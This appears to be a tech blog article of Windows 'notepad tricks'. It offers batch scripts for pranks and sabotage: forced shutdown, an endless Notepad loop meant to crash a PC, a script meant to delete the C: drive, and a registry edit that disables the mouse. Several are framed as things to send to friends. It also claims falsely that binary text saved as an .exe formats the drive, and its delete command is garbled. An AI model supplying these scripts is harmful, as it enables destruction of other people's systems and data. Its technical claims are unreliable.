Close Menu
Technotification
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Technotification
    • Home
    • News
    • How To
    • Explained
    • Facts
    • Lists
    • Programming
    • Security
    • Gaming
    Technotification
    Home › Guides › These Interesting Notepad Tricks will make you feel like a hacker

    These Interesting Notepad Tricks will make you feel like a hacker

    By Vikram Singh RaoAugust 14, 2017
    Facebook Twitter Reddit LinkedIn
    Interesting Notepad Tricks

    Windows Operating system allows you to do more interesting things on your computer you probably didn’t know before. We have shared some articles related to Windows command prompt. You can access many hidden features of windows using CMD. However, you can also make a batch file of CMD commands which can be executed using Notepad. This article contains several Interesting notepad tricks.

    Note: Some of the tricks are extremely dangerous, Don’t execute them on your own PC. We are not responsible if anything wrong happens.

    Some Interesting Notepad Tricks

    1. Create Notepad Virus that Shutdown your Friend Computer with Message

    Open Notepad and Type:-

    @echo off
    Shutdown.exe -s -t 10
    cls
    msg * I don’t like you MATE!

    Save it as “shutdownvirus.bat”.

    2. Open 100s of Notepad Tab to Crash a Computer.

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

    Save it as “Unlimitednotepad.bat” and send it to your friends.

    3. Make A Personal Log-Book or A Diary

    Open Notepad and type:

    .LOG (in capital letters)
    Save it as “personaldiary.txt”.

    When you open the file again you will see the current date and time is inserted automatically after the LOG line. This will happen automatically every time you reopen the notepad file.

    4. Test Your Anti-Virus Program effectiveness

    Test your antivirus is work or not from type this below code in your notepad.

    Copy the code given below in your notepad file:

    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

    Save it as “virus.exe” on your computer.

    When you save that file in your Computer, you antivirus prompt and say this is working virus. So you know antivirus is working properly on your Window PC Computer.

    5. Create Matrix Movie Computer Screen Effects in Your Computer

    Open Notepad and Type:

    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

    Save the file name as ”matrix .bat ” in your Computer.

    6. Constantly Repeat Notepad Messages

    @ECHO off
    :Begin
    msg * Hi
    msg * Are you having fun?
    msg * I am!
    msg * Let's have fun together!
    msg * Because you have been o-w-n-e-d
    GOTO BEGIN

    Save the file name but with “continue.bat” extension on your computer. When you open this file in your computer, you see message line by line without type anything.

    7. Format your Whole Hard Disk from Type Code in Notepad

    This is really interesting things for you guys, you can format any Hard Drive from typing below code on the computer.

    Open notepad and type the below code in your Computer.

    01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

    Save it as “Format.exe” file giving any name you desire.

    That’s It! Now just double click on the file (to open it) and your C: drive will be formatted!
    This is just a little binary trick. Be Careful while using it.

    8. Write Simple Undetectable Virus

    @Echo off
    Del C:\ *.* |y

    And save that as bomb.bat in your Computer.

    Warning: Never run this file on your Computer, because this file deletes your entire system C: Drive.

    9. Disable the Mouse Controls in Computer

    rem Disable Mouse
    set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4

    Never try this trick in your Computer, because this trick disables your mouse.

    Share. Facebook Twitter LinkedIn Tumblr Reddit Telegram WhatsApp
    Vikram Singh Rao
    • Website
    • Facebook
    • X (Twitter)
    • LinkedIn

    I am an entrepreneur at heart who has made his hobby turned a passion, his profession now.

    Related Posts

    Common Cyber Attacks and How to Prevent Them

    July 3, 2024

    Comparing Traditional vs. Digital Metrology Tools

    June 27, 2024

    Microsoft Office 2013 Full Version Free Download (2025)

    January 2, 2025

    How to install Chrome in Ubuntu Linux?

    October 2, 2023

    Tips for Post-Migration Support and Monitoring

    September 16, 2023

    Choosing the right tool for Database Administrator

    August 21, 2023
    Lists You May Like

    10 Best RARBG Alternative Sites in April 2025 [Working Links]

    April 1, 2025

    The Pirate Bay Proxy List in 2025 [Updated List]

    January 2, 2025

    10 Sites to Watch Free Korean Drama [2025 Edition]

    January 2, 2025

    10 Best Torrent Search Engine Sites (2025 Edition)

    February 12, 2025

    10 Best GTA V Roleplay Servers in 2025 (Updated List)

    January 6, 2025

    5 Best Torrent Sites for Software in 2025

    January 2, 2025

    1337x Alternatives, Proxies, and Mirror Sites in 2025

    January 2, 2025

    10 Best Torrent Sites for eBooks in 2025 [Working]

    January 2, 2025

    10 Best Anime Torrent Sites in 2025 [Working Sites]

    January 6, 2025

    Top Free Photo Editing Software For PC in 2025

    January 2, 2025
    Pages
    • About
    • Contact
    • Privacy
    • Careers
    Privacy

    Information such as the type of browser being used, its operating system, and your IP address is gathered in order to enhance your online experience.

    © 2013 - 2025 Technotification | All rights reserved.

    Type above and press Enter to search. Press Esc to cancel.